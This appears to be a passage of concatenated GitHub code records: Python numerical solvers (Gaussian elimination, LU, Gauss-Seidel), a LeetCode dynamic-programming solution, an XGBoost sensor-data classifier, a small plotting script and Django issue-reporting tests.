-(1.43e+07*(x[i]**4))\n if pf==2 and t2 == 500:\n t[i] = t1 + (6093*x[i]) -(21730*(x[i]**2)) + (2.43e+06*(x[i]**3)) -(3.53e+07*(x[i]**4))\n if pf==2 and t2 == 600:\n t[i] = t1 + (9139*x[i]) + (68068*(x[i]**2)) -(1.14e+07*(x[i]**3)) + (7.31e+08*(x[i]**4)) - (1.72e+10*(x[i]**5)) + (1.34e+11*(x[i]**6))\n if pf==2 and t2 == 700:\n t[i] = t1 + (12658*x[i]) + (158808*(x[i]**2)) -(2.99e+07*(x[i]**3)) + (1.76e+09*(x[i]**4)) - (3.94e+10*(x[i]**5)) + (2.97e+11*(x[i]**6))\n if pf==2 and t2 == 800:\n t[i] = t1 + (16362*x[i]) + (277523*(x[i]**2)) -(5.46e+07*(x[i]**3)) + (3.13e+09*(x[i]**4)) - (6.9e+10*(x[i]**5)) + (5.14e+11*(x[i]**6))\n if pf==2 and t2 == 900:\n t[i] = t1 + (20211*x[i]) + (404420*(x[i]**2)) -(8.26e+07*(x[i]**3)) + (4.7e+09*(x[i]**4)) - (1.03e+11*(x[i]**5)) + (7.67e+11*(x[i]**6))\n if pf==2 and t2 == 1000:\n t[i] = t1 + (25067*x[i]) + (95744*(x[i]**2)) -(2.5e+07*(x[i]**3)) -(2.49e+09*(x[i]**4)) + (3.54e+11*(x[i]**5)) -(1.41e+13*(x[i]**6)) + (2.38e+14*(x[i]**7)) -(1.45e+15*(x[i]**8))\n if pf==2 and t2 == 1100:\n t[i] = t1 + (29276*x[i]) + (127388*(x[i]**2)) -(3.69e+07*(x[i]**3)) -(2.63e+09*(x[i]**4)) + (4.21e+11*(x[i]**5)) -(1.7e+13*(x[i]**6)) + (2.86e+14*(x[i]**7)) -(1.73e+15*(x[i]**8))\n if pf==2 and t2 == 1200:\n t[i] = t1 + (33522*x[i]) + (161617*(x[i]**2)) -(5.06e+07*(x[i]**3)) -(2.61e+09*(x[i]**4)) + (4.81e+11*(x[i]**5)) -(1.98e+13*(x[i]**6)) + (3.33e+14*(x[i]**7)) -(2.00e+15*(x[i]**8))\n if pf==2 and t2 == 1300:\n t[i] = t1 + (37796*x[i]) + (199682*(x[i]**2)) -(6.62e+07*(x[i]**3)) -(2.38e+09*(x[i]**4)) + (5.3e+11*(x[i]**5)) -(2.23e+13*(x[i]**6)) + (3.76e+14*(x[i]**7)) -(2.24e+15*(x[i]**8))\n \n return t\n\ndef xi_1d(t,n,md,mi0,v,phi_p,kb):\n xi = np.zeros(n)\n cte = (mi0*(md**2)*phi_p*v)/(3*kb)\n for i in range(n):\n xi[i] = cte/t[i]\n\n return xi\n\n\ndef Gauss(A, b):\n \"\"\"\n Gaussian Elimination with Backward Substitution\n \"\"\"\n lines, columns = A.shape\n n = lines\n\n M = np.zeros((n, n + 1))\n M[:, :-1] = A\n M[:, -1] = b\n\n x = np.zeros(n)\n for i in range(n - 1):\n p = i\n while p < n - 1 and M[p][i] == 0:\n p += 1\n if 
p != i:\n M[[i, p]] = M[[p, i]] # swap rows (fancy indexing copies; a tuple swap of numpy views would alias)\n if p == n - 1:\n # print(\"Solution doesn't exist - 1\")\n return None\n for j in range(i + 1, n):\n m = M[j][i] / M[i][i]\n M[j] = M[j] - m * M[i]\n # print(M)\n if M[n - 1][n - 1] == 0:\n # print(\"Solution doesn't exist - 2\")\n return None\n x[-1] = M[-1][-1] / M[-1][-2]\n for i in range(n - 2, -1, -1):\n soma = 0\n for j in range(i + 1, n):\n soma += M[i][j] * x[j]\n x[i] = (M[i][-1] - soma) / M[i][i]\n return x\n\ndef Partial(A, b):\n \"\"\"\n Gaussian Elimination with Partial Pivoting\n \"\"\"\n lines, columns = A.shape\n n = lines\n\n M = np.zeros((n, n + 1))\n M[:, :-1] = A\n M[:, -1] = b\n\n x = np.zeros(n)\n nrow = np.zeros(n, dtype=int)\n for i in range(n):\n nrow[i] = i\n for i in range(n - 1):\n maxim = 0\n p = i\n for j in range(i, n):\n if np.abs(M[nrow[j]][i]) > maxim:\n maxim = np.abs(M[nrow[j]][i])\n p = j\n if M[nrow[p]][i] == 0:\n # print(\"Solution doesn't exist - 1\")\n return None\n if nrow[i] != nrow[p]:\n nrow[i], nrow[p] = nrow[p], nrow[i] # swap rows of M\n for j in range(i + 1, n):\n m = M[nrow[j]][i] / M[nrow[i]][i]\n M[nrow[j]] = M[nrow[j]] - m * M[nrow[i]]\n # print(M)\n if M[nrow[-1]][n] == 0:\n # print(\"Solution doesn't exist - 2\")\n return None\n x[-1] = M[nrow[-1]][-1] / M[nrow[-1]][-2]\n for i in range(n - 2, -1, -1):\n soma = 0\n for j in range(i + 1, n):\n soma += M[nrow[i]][j] * x[j]\n x[i] = (M[nrow[i]][-1] - soma) / M[nrow[i]][i]\n return x\n\n\ndef Scaled(A, b):\n \"\"\"\n Gaussian Elimination with Scaled Partial Pivoting\n \"\"\"\n lines, columns = A.shape\n n = lines\n\n M = np.zeros((n, n + 1))\n M[:, :-1] = A\n M[:, -1] = b\n\n x = np.zeros(n)\n nrow = np.zeros(n, dtype=int)\n\n # Only this difference between this algorithm and the precedent\n s = np.zeros(n)\n for i in range(n):\n for j in range(n):\n if s[i] < np.abs(M[i][j]):\n s[i] = np.abs(M[i][j])\n if s[i] == 0:\n return None\n # Until here\n\n for i in range(n):\n nrow[i] = i\n for i in range(n - 1):\n maximo = 0\n p = i\n for j in range(i, n):\n if np.abs(M[nrow[j]][i]) / s[nrow[j]] > maximo: # this line changed\n maximo = np.abs(M[nrow[j]][i]) / s[nrow[j]] # and this one\n p = j\n\n if M[nrow[p]][i] == 0:\n # print(\"Solution doesn't exist - 1\")\n return None\n if nrow[i] != nrow[p]:\n nrow[i], nrow[p] = nrow[p], nrow[i] # swap rows of M\n for j in range(i + 1, n):\n m = M[nrow[j]][i] / M[nrow[i]][i]\n M[nrow[j]] = M[nrow[j]] - m * M[nrow[i]]\n # print(M)\n if M[nrow[-1]][n] == 0:\n # print(\"Solution doesn't exist - 2\")\n return None\n x[-1] = M[nrow[-1]][-1] / M[nrow[-1]][-2]\n for i in range(n - 2, -1, -1):\n soma = 0\n for j in range(i + 1, n):\n soma += M[nrow[i]][j] * x[j]\n x[i] = (M[nrow[i]][-1] - soma) / M[nrow[i]][i]\n return x\n\n\ndef LUFactorization(A):\n \"\"\"\n LU Factorization\n This algorithm is good if you have always the same matrix A, and with different configurations of b.\n \"\"\"\n lines, columns = A.shape\n n = lines\n\n L = np.zeros((n, n))\n U = np.zeros((n, n))\n\n if A[0, 0] == 0:\n # Impossible factorization\n return None, None\n L[0, 0] = A[0, 0]\n\n U[0] = A[0] / L[0, 0]\n L[:, 0] = A[:, 0] / U[0, 0]\n\n for i in range(1, n - 1):\n soma = 0\n for k in range(i):\n soma += L[i, k] * U[k, i]\n L[i, i] = A[i, i] - soma\n U[i, i] = 1\n if L[i, i] == 0:\n # Impossible factorization\n return None, None\n\n for j in range(i + 1, n):\n soma = 0\n for k in range(i):\n soma += L[i, k] * U[k, j]\n U[i, j] = (A[i, j] - soma) / L[i, i]\n soma = 0\n for k in range(i):\n soma += L[j, k] * U[k, i]\n L[j, 
i] = (A[j, i] - soma) / U[i, i]\n soma = 0\n for k in range(n - 1):\n soma += L[-1, k] * U[k, -1]\n L[-1, -1] = (A[-1, -1] - soma)\n U[-1, -1] = 1\n if L[-1, -1] == 0:\n # Impossible, matrix A is singular\n return None, None\n return L, U\n\ndef solvewithLU(L, U, b):\n\n # Now that A * x = b\n # and A = L * U\n # So, L*U*x = b is equal to\n # L*y = b\n # U*x = y\n # So, we find frist y and after that x\n # Now, it's solve using\n if L is None: # If it couldn't decompose A in LU method\n return None\n n = len(b)\n y = np.zeros(n)\n x = np.zeros(n)\n\n y[0] = b[0] / L[0, 0]\n for i in range(1, n):\n soma = 0\n for j in range(i):\n soma += L[i, j] * y[j]\n y[i] = (b[i] - soma) / L[i, i]\n\n x[-1] = y[-1] / U[-1, -1]\n for i in range(n - 1, -1, -1):\n soma = 0\n for j in range(i + 1, n):\n soma += U[i, j] * x[j]\n x[i] = (y[i] - soma) / U[i, i]\n\n return x\n\ndef gauss_seidel(A: np.ndarray, b: np.ndarray, tol=1e-3, max_iter=1e4):\n \n \"\"\"Gauss Seidel Method for solving linear systems of equations.\n\n Raises:\n ValueError: A is not diagonally dominant\n ValueError: A is not a square matrix\n ValueError: A and b are not the same size\n \n Args:\n A (np.ndarray): Coefficient matrix\n b (np.ndarray): Vector of constants\n tol (float, optional): Tolerance. Defaults to 1e-10.\n max_iter (int, optional): Maximum number of iterations. Defaults to 1e4.\n \"\"\"\n \n for i in range(len(b)):\n \n if A[i][i] == 0:\n raise ValueError(\"A is not diagonally dominant\")\n \n elif len(A) != len(A[0]):\n raise ValueError(\"A is not a square matrix\")\n \n elif len(A) != len(b):\n raise ValueError(\"A and b are not the same size\")\n \n N = len(b)\n x = np.zeros(N, float)\n R = np.zeros(N, float)\n \n iteration = 0\n x, R = gauss_seidel_main_loo(A, b, x, R, N, tol, max_iter)\n return([x, R])\n\n@njit(fastmath=True)\ndef gauss_seidel_main_loo(A, b, x, R, N, tol=1e-3, max_iter=1e4, iteration=0):\n while True and iteration < max_iter:\n for i in range(N):\n sumation = 0.\n \n for j in range(N):\n sumation += A[i,j] * x[j]\n \n R[i] = (1.0/A[i,i]) * (b[i] - sumation)\n \n x[i] += R[i]\n \n print(np.max(np.abs(R)), iteration)\n if np.max(np.abs(R)) < tol:\n break\n \n iteration += 1\n return([x, R])\n\n\n\n\n\n\n\n\n\n","repo_name":"roberto040100/Potencial-Magn-tico","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":14710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17214312004","text":"\"\"\"\ntop down dp\n\nO(m * n * L) where L is the average length of words in strs\n\"\"\"\nclass Solution:\n def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n\n for st in strs:\n numOne, numZero = st.count('0'), st.count('1')\n\n for i in range(m, numOne - 1, -1):\n for j in range(n, numZero - 1, -1):\n dp[i][j] = max(dp[i][j], dp[i - numOne][j - numZero] + 1)\n return dp[m][n]","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/dynamic_programming/474_OnesAndZeros.py","file_name":"474_OnesAndZeros.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19169476591","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport numpy as np\nimport random\nimport time\nimport os\nimport argparse\n\nfrom utils import models2 as models\nfrom sys import stdout\nfrom IPython import embed\nfrom sklearn.model_selection import train_test_split\nfrom 
xgboost.sklearn import XGBClassifier\nimport pickle\nimport sys\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\nclass main():\n def __init__(self, args):\n # args\n self.epochs = args.epochs\n self.batch_size = args.batch_size\n self.lr = args.lr_rate\n self.path = args.data_path\n self.print_iter = args.print_iter\n self.save_iter = args.save_iter\n self.model_dump = args.model_dump\n\n # init\n self.loss_epoch_tr = []\n self.acc_epoch_tr = []\n self.loss_epoch_va = []\n self.acc_epoch_va = []\n\n\n def load_data(self):\n print(\"Load prepro-data...\")\n Trans = []\n\n train_data_list = [\n \"Type1-GAM-training.npy\",\n \"Type2-GAM-training.npy\",\n \"Type3-GAM-training.npy\",\n \"Type4-GAM-training.npy\",\n \"Type5-GAM-training.npy\"]\n\n train_x, valid_x = [], []\n train_y, valid_y = [], []\n a = {0:[],1:[],2:[],3:[],4:[]}\n for idx, file in enumerate(train_data_list):\n data = np.load(os.path.join(self.path, file))\n # assert np.array([ np.isnan(i).astype(int).sum()!=0 for i in data.tolist()]).astype(int).sum() == 0\n data_tr, data_va = train_test_split(data.tolist(), test_size=0.2, random_state=1126)\n\n print(\"\\tThere are {} ({}+{}) log files in {} data with label {}.\".format(len(data_tr)+len(data_va), len(data_tr), len(data_va), file, idx))\n tmp_x = []\n\n for file in data_tr:\n for row in file:\n flat_row = row.reshape(-1)\n tmp_x.append(flat_row)\n\n if idx == 4:\n tmp_x = random.sample(tmp_x, 50000)\n tmp_y = [idx]*len(tmp_x)\n\n train_x.extend(tmp_x)\n train_y.extend(tmp_y)\n print(\"\\t\\tThere are {} train data.\".format(len(tmp_x)))\n\n tmp_x = []\n for file in data_va:\n for row in file:\n flat_row = row.reshape(-1)\n tmp_x.append(flat_row)\n\n if idx == 4:\n tmp_x = random.sample(tmp_x, 18000)\n tmp_y = [idx]*len(tmp_x)\n valid_x.extend(tmp_x)\n valid_y.extend(tmp_y)\n print(\"\\t\\tThere are {} valid data.\".format(len(tmp_x)))\n\n self.train_x = np.array(train_x)\n self.train_y = np.array(train_y)\n self.valid_x = np.array(valid_x)\n self.valid_y = np.array(valid_y)\n self.train_num_x = len(self.train_x)\n self.valid_num_x = len(self.valid_x)\n print(\"There are {} training data.\".format(self.train_num_x))\n print(\"There are {} validation data.\".format(self.valid_num_x))\n\n\n def load_data_aug(self):\n print(\"Load prepro-data...\")\n Trans = []\n while len(Trans) < 64:\n a, b = np.random.uniform(low=-100, high=100, size=(3,)), np.random.uniform(low=-100, high=100, size=(3,))\n while np.linalg.norm(a) < 0.1 :\n a = np.random.uniform(low=-100, high=100, size=(3,))\n while np.linalg.norm(b) < 0.1 :\n b = np.random.uniform(low=-100, high=100, size=(3,))\n c = np.cross(a, b)\n b = np.cross(a, c)\n\n a = (a/np.linalg.norm(a)).reshape(-1, 1)\n b = (b/np.linalg.norm(b)).reshape(-1, 1)\n c = (c/np.linalg.norm(c)).reshape(-1, 1)\n trans = np.concatenate((a, b, c), axis=1)\n Trans.append(trans)\n self.Trans = Trans\n\n train_data_list = [\n \"Type1-GAM-training.npy\",\n \"Type2-GAM-training.npy\",\n \"Type3-GAM-training.npy\",\n \"Type4-GAM-training.npy\",\n \"Type5-GAM-training.npy\"]\n\n train_x, valid_x = [], []\n train_y, valid_y = [], []\n a = {0:[],1:[],2:[],3:[],4:[]}\n for idx, file in enumerate(train_data_list):\n data = np.load(os.path.join(self.path, file))\n # assert np.array([ np.isnan(i).astype(int).sum()!=0 for i in data.tolist()]).astype(int).sum() == 0\n data_tr, data_va = train_test_split(data.tolist(), test_size=0.2, random_state=1126)\n\n print(\"\\tThere are {} ({}+{}) log files in {} data with label 
{}.\".format(len(data_tr)+len(data_va), len(data_tr), len(data_va), file, idx))\n tmp_x = []\n\n for file in data_tr:\n for row in file:\n tmp_x.append(row)\n\n if idx == 4:\n tmp_x = random.sample(tmp_x, 50000)\n tmp_y = [idx]*len(tmp_x)\n\n train_x.extend(tmp_x)\n train_y.extend(tmp_y)\n print(\"\\t\\tThere are {} train data.\".format(len(tmp_x)))\n\n tmp_x = []\n for file in data_va:\n for row in file:\n tmp_x.append(row)\n\n if idx == 4:\n tmp_x = random.sample(tmp_x, 18000)\n tmp_y = [idx]*len(tmp_x)\n valid_x.extend(tmp_x)\n valid_y.extend(tmp_y)\n print(\"\\t\\tThere are {} valid data.\".format(len(tmp_x)))\n\n self.train_x = np.array(train_x)\n self.train_y = np.array(train_y)\n self.valid_x = np.array(valid_x)\n self.valid_y = np.array(valid_y)\n print(self.train_x.shape)\n for i in range(3):\n new_train_x = self.random_rotate(np.array(train_x))\n self.train_x = np.concatenate((self.train_x,new_train_x),axis=0)\n self.train_y = np.concatenate((self.train_y,np.array(train_y)),axis=0)\n self.train_x =self.train_x.reshape(-1,128*9)\n print(self.train_x.shape)\n print(self.train_y.shape)\n self.train_num_x = len(self.train_x)\n self.valid_num_x = len(self.valid_x)\n print(\"There are {} training data.\".format(self.train_num_x))\n print(\"There are {} validation data.\".format(self.valid_num_x))\n\n def load_testdata(self):\n print(\"Load test data...\")\n test_data_list = [\n \"Type1-GAM-testing.npy\",\n \"Type2-GAM-testing.npy\",\n \"Type3-GAM-testing.npy\",\n \"Type4-GAM-testing.npy\",\n \"Type5-GAM-testing.npy\"]\n test_x,test_y = [],[]\n data_test_by_file = []\n\n for idx, testfile in enumerate(test_data_list):\n test = np.load(os.path.join(self.path, testfile))\n # assert np.array([ np.isnan(i).astype(int).sum()!=0 for i in data.tolist()]).astype(int).sum() == 0\n print(\"\\tThere are {} log files in {} data with label {}.\".format(len(test), testfile, idx))\n for file in test:\n data_test_by_file.append((file,idx))\n for row in file:\n flat_row = row.reshape(-1)\n test_x.append(flat_row.tolist())\n test_y.append(idx)\n self.test_x = np.array(test_x)\n self.test_y = np.array(test_y)\n self.test_data_by_file = data_test_by_file\n self.test_num_data = len(self.test_x)\n print(\"There are {} testing data\".format(self.test_num_data))\n\n def create_model(self):\n print(\"Create model.\")\n self.model = XGBClassifier() \n\n def random_rotate(self,x):\n trans = random.sample(self.Trans,1)[0]\n\n xg = x[:,:,:3]\n xa = x[:,:,3:6]\n xm = x[:,:,6:]\n\n n_xg = np.dot(xg,trans)\n n_xa = np.dot(xa,trans)\n n_xm = np.dot(xm,trans)\n\n out = np.concatenate((n_xg,n_xa,n_xm),axis=2)\n return out\n\n def trainInit(self):\n self.load_data()\n self.create_model()\n\n def Add_feature(self, input_data): # input_data.shape: ( N, 130, 9 )\n # embed()\n x = np.array(input_data)\n\n bs = x.shape[0]\n x0 = x[:, :-2]\n x1 = x[:, 1:-1]\n x2 = x[:, 2:]\n\n diff0 = x1 - x0\n diff1 = x2 - x1\n ddiff0 = diff1 - diff0\n\n magG = ((x0[:, :, 0]**2 + x0[:, :, 1]**2 + x0[:, :, 2]**2) ** 0.5).reshape(-1, 128, 1)\n magA = ((x0[:, :, 3]**2 + x0[:, :, 4]**2 + x0[:, :, 5]**2) ** 0.5).reshape(-1, 128, 1)\n magM = ((x0[:, :, 6]**2 + x0[:, :, 7]**2 + x0[:, :, 8]**2) ** 0.5).reshape(-1, 128, 1)\n\n return np.concatenate((x0, diff0, ddiff0, magG, magA, magM), axis=2)\n # return np.array(input_data)[:, :128, ]\n\n def train(self):\n t1 = time.time()\n self.model.fit(self.train_x,self.train_y)\n\n def save_model(self,chkptfile):\n with open(chkptfile, 'wb') as wf:\n pickle.dump(final.model, wf, 
protocol=pickle.HIGHEST_PROTOCOL)\n\n\n def load_model(self, chkptfile):\n with open(chkptfile, 'rb') as rf:\n self.model = pickle.load(rf)\n\n def test(self):\n self.load_testdata()\n print(\"------------------{}-------------------\".format(\"Test By Each 128 \"))\n pred = self.model.predict(self.test_x)\n test_acc, label_list, pred_list, test_c_acc, test_len = [], [], [], [], 0\n\n acc = (pred==self.test_y)\n test_acc.extend(acc)\n print(\"test_acc {:.2f}%\".format(np.mean(test_acc)*100))\n for c in range(5):\n label_arr = np.array(self.test_y)\n c_loc = np.nonzero(label_arr == c) \n test_c_acc.append(np.mean(np.equal(pred[c_loc], c)))\n print(\"test_type {} acc {:.2f}%\".format(c, test_c_acc[-1]*100))\n return np.mean(test_acc), test_c_acc\n\n def test_by_file(self):\n #self.load_testdata()\n print(\"------------------{}-------------------\".format(\"Test By Each File \"))\n f_acc = [[] for i in range(5)]\n for file, idx in self.test_data_by_file:\n file_test_x = []\n for row in file:\n file_test_x.append(row.reshape(-1))\n file_test_y = np.array([idx]*len(file_test_x))\n file_test_x = np.array(file_test_x)\n file_pred = []\n pred = self.model.predict(file_test_x)\n acc = np.mean(np.equal(pred,file_test_y))\n f_acc[idx].append(acc)\n # print(file_pred)\n # print(idx)\n # input()\n t = []\n for c in range(5):\n t.extend(f_acc[c])\n print(\"test_acc {:.2f}%\".format(np.mean(t)*100))\n for c in range(5):\n print(\"test_type {} acc {:.2f}%\".format(c, np.mean(f_acc[c])*100))\n print(\"-------------------------------------------------------\")\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-dp', '--data_path', type=str, default='data')\n parser.add_argument('-e', '--epochs', type=int, default=5)\n parser.add_argument('-b', '--batch_size', type=int, default=64)\n parser.add_argument('-lr', '--lr_rate', type=float, default=1e-4)\n parser.add_argument('-md', '--model_dump', type=str, default='chkpt/xgb_aug.pickle')\n parser.add_argument('-o', '--output_csv', type=str, default='output.csv')\n parser.add_argument('-p', '--print_iter', type=int, default=1e3, help='Print every p iterations')\n parser.add_argument('-s', '--save_iter', type=int, default=30, help='Save every p iterations')\n args = parser.parse_args()\n\n final = main(args)\n final.create_model()\n final.load_data_aug()\n final.train()\n final.save_model(args.model_dump)\n final.load_model(args.model_dump)\n final.test()\n final.test_by_file()\n \n sys.exit()\n\n\n \"\"\"\n final.load_data()\n t1 = time.time()\n gen = final.data_generator(64)\n for idx, (input_data, labels) in enumerate(gen):\n pass\n print(\"Spends {:2.f} seconds for generating train data with one epoch.\".format(time.time() - t1))\n \"\"\"\n","repo_name":"BaiiYuan/SDML-Final","sub_path":"XGboost/main_xgboost.py","file_name":"main_xgboost.py","file_ext":"py","file_size_in_byte":12041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2683260136","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ndef datas_getter():\r\n datas = []\r\n datas.append(np.genfromtxt('data_question_2a.csv', delimiter=\",\"))\r\n datas.append(np.genfromtxt('data_question_2b.csv', delimiter=\",\"))\r\n datas.append(np.genfromtxt('data_question_2c.csv', delimiter=\",\"))\r\n return datas\r\n\r\ndef data_plotter(datas):\r\n for data in datas:\r\n x_data, y_data = data[:,0], data[:,1]\r\n fig, ax=plt.subplots() \r\n ax.plot(x_data, y_data,'o')\r\n ax.axis(\"equal\")\r\n 
plt.show()\r\n\r\ndef discrete_mean_values(datas):\r\n x_means = []\r\n y_means = []\r\n for data in datas: \r\n x_data, y_data = data[:,0], data[:,1]\r\n x_means.append(np.mean(x_data))\r\n y_means.append(np.mean(y_data))\r\n return x_means, y_means\r\n\r\ndef correlation_finder(datas):\r\n correlations = []\r\n for data in datas:\r\n x_data, y_data = data[:,0], data[:,1]\r\n correlations.append(np.corrcoef(np.array(x_data), np.array(y_data)))\r\n return correlations\r\n\r\n\r\nif __name__ == '__main__':\r\n datas = datas_getter()\r\n data_plotter(datas)\r\n x_means, y_means = discrete_mean_values(datas)\r\n correlations = correlation_finder(datas)\r\n data_id = ['A', 'B', 'C']\r\n for data_num in range(len(datas)): print(f\"data {data_id[data_num]}: x mean{x_means[data_num]:.2f}, y mean {y_means[data_num]:.2f}, corr(x, y) = {correlations[data_num][0,1]:.2f}\")","repo_name":"modziE3/EMTH211","sub_path":"t11_Q2.py","file_name":"t11_Q2.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13885350920","text":"from ecutils.tests import MongoTestCase\n\nclass IssuesTestCase(MongoTestCase):\n\n def setUp(self):\n from accounts.tests import setUpAccounts\n from locations.tests import setUpLocations\n from resources.tests import setUpResources\n setUpAccounts(self)\n setUpLocations(self)\n setUpResources(self)\n\nclass ApiTestCase(IssuesTestCase):\n\n def test_create(self):\n\n from issues.models import Issue, \\\n SEVERITY_LOW, SEVERITY_MEDIUM, SEVERITY_HIGH, SEVERITY_CRITICAL\n from resources.models import Resource\n\n # errors on save if these resources aren't reloaded.\n # why ???\n self.resource1 = Resource.objects.get(id=self.resource1.id)\n self.resource3 = Resource.objects.get(id=self.resource3.id)\n\n # create issues\n issue, created = Issue.objects.get_or_create(\n message = 'blah blah',\n severity = SEVERITY_LOW,\n reporter = self.bob,\n related_document=self.resource1\n )\n issue.curators = [self.emma, self.hugo]\n issue.save()\n self.assertEqual(issue.related_document.title, 'title 1')\n self.assertEqual(issue.resource_owner, self.alice)\n\n issue2, created = Issue.objects.get_or_create(\n message = 'more blah blah',\n severity = SEVERITY_MEDIUM,\n reporter = self.alice,\n related_document=self.resource3\n )\n issue2.curators = [self.jorph, self.hugo]\n issue2.save()\n self.assertEqual(issue2.related_document.title, 'title 3')\n self.assertEqual(issue2.resource_owner, self.bob)\n\n self.assertTrue(Issue.objects.count() == 2)\n\n\n # send accountmessages\n\n # add some comments\n\n # check messages sent\n\n # get messages for an account\n self.assertEqual(2, Issue.objects.for_account(self.bob).count())\n self.assertEqual(1, Issue.objects.for_account(self.jorph).count())\n\n # get issues for an account\n\n # resolve issue\n\n # check messages\n\n # check resource moderation\n\n\nclass ViewsTestCase(IssuesTestCase):\n\n def setUp(self):\n super(ViewsTestCase, self).setUp()\n\n from django.test.client import Client\n\n self.client = Client()\n\n def test_no_issues(self):\n\n from django.core.urlresolvers import reverse\n\n # Can't access when we are not logged in.\n response = self.client.get(reverse('issue_list'))\n self.assertEqual(response.status_code, 302)\n\n self.client.login(username='bob', password='password')\n\n 
response = self.client.get(reverse('issue_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"You don't have any issues at the moment.\")\n\n def test_report(self):\n\n from django.core.urlresolvers import reverse\n from resources.models import Resource\n from issues.models import Issue, \\\n SEVERITY_LOW, SEVERITY_MEDIUM, SEVERITY_HIGH, SEVERITY_CRITICAL\n\n\n # Can't access when we are not logged in.\n response = self.client.get(reverse(\n 'resource_report',\n kwargs={'object_id': self.resource1.id}))\n self.assertEqual(response.status_code, 302)\n\n self.client.login(username='bob', password='password')\n\n response = self.client.get(reverse(\n 'resource_report',\n kwargs={'object_id': self.resource1.id}))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"ALISS: report %s\" % self.resource1.title)\n\n response = self.client.post(\n reverse(\n 'resource_report',\n kwargs={'object_id': self.resource1.id}),\n data={'severity': '1', 'message': 'I am reporting this now.'})\n self.assertEqual(response.status_code, 302)\n\n issue = Issue.objects.first()\n self.assertEqual(issue.severity, 1)\n self.assertEqual(issue.message, 'I am reporting this now.')\n self.assertEqual(issue.reporter, self.bob)\n self.assertEqual(issue.related_document, self.resource1)\n\n response = self.client.post(reverse('issue_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'I am reporting this now.')\n\n response = self.client.post(reverse('issue_detail', kwargs={'object_id': issue.id}))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, 'I am reporting this now.')\n\n\n\n\n# class ApiTestCase(IssuesTestCase):\n\n# def test_types(self):\n\n# from issues.models import AlertType\n\n# nt, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# def test_create(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# accounts = [self.bob, self.alice]\n\n# Alert.objects.create_for_accounts(accounts, type=expired,\n# severity=1, message='Curation X has expired'\n# )\n\n# Alert.objects.create_for_accounts(accounts, type=\"expired\",\n# severity=1, message='Curation X has expired'\n# )\n\n# Alert.objects.create_for_accounts(accounts, type=\"test\",\n# severity=1, message='Curation X has expired'\n# )\n\n# test, created = AlertType.objects.get_or_create(name=\"expired\")\n# self.assertFalse(created)\n\n# def test_get_alerts(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# self.assertEqual(0, Alert.objects.for_account(self.bob).count())\n\n# Alert.objects.create_for_account(self.bob, type=expired,\n# severity=1, message='Curation X has expired'\n# )\n\n# self.assertEqual(1, Alert.objects.for_account(self.bob).count())\n\n# def test_get_member_alerts(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n# incorrect, _ = AlertType.objects.get_or_create(name=\"incorrect\")\n\n# self.assertEqual(0, Alert.objects.for_account(self.alice).count())\n\n# # Create a notification for alice and orgnaisation1\n# Alert.objects.create_for_accounts([self.alice, self.company],\n# type=expired, severity=1, message='Curation X is going to expire')\n\n# # Create a notification for orgnanisation1\n# Alert.objects.create_for_account(self.company,\n# type=incorrect, severity=1, message='Curation Y is 
incorrect')\n\n# # Create a notification for alice\n# Alert.objects.create_for_account(self.alice,\n# type=expired, severity=1, message='Curation Z is going to expire')\n\n# self.assertEqual(2, Alert.objects.for_account(self.alice).count())\n# self.assertEqual(2, Alert.objects.for_account(self.company).count())\n\n# def test_group_alerts(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# Alert.objects.create_for_accounts([self.bob, self.alice],\n# type=expired, severity=3, message='Curation X has expired')\n\n# bob_notification, = Alert.objects.for_account(self.bob)\n# alice_notification, = Alert.objects.for_account(self.alice)\n\n# self.assertEqual(bob_notification.group, alice_notification.group)\n\n# def test_severity(self):\n\n# from issues.models import Alert, AlertType\n\n# expired, _ = AlertType.objects.get_or_create(name=\"expired\")\n\n# for i in range(4):\n# for _ in range(i + 1):\n# Alert.objects.create_for_account(self.alice,\n# type=expired, severity=i, message='Expiration warning')\n\n# self.assertEqual(Alert.objects.low(self.alice).count(), 1)\n# self.assertEqual(Alert.objects.medium(self.alice).count(), 2)\n# self.assertEqual(Alert.objects.high(self.alice).count(), 3)\n# self.assertEqual(Alert.objects.critical(self.alice).count(), 4)\n\n# def test_related_document(self):\n\n# from issues.models import Alert, AlertType\n\n# account, _ = AlertType.objects.get_or_create(name=\"account\")\n\n# notification = Alert.objects.create_for_account(self.alice,\n# type=account, severity=1, message=\"Password about to expire\",\n# related_document=self.alice)\n\n# self.assertEqual(notification.related_document, self.alice)\n\n\n# class ViewsTestCase(AlertsTestCase):\n\n# def setUp(self):\n# super(ViewsTestCase, self).setUp()\n\n# from django.test.client import Client\n\n# self.client = Client()\n\n# def test_no_alerts(self):\n\n# from django.core.urlresolvers import reverse\n\n# # Can't access when we are not logged in.\n# response = self.client.get(reverse('alerts-list'))\n# self.assertEqual(response.status_code, 302)\n\n# self.client.login(username='bob', password='password')\n\n# response = 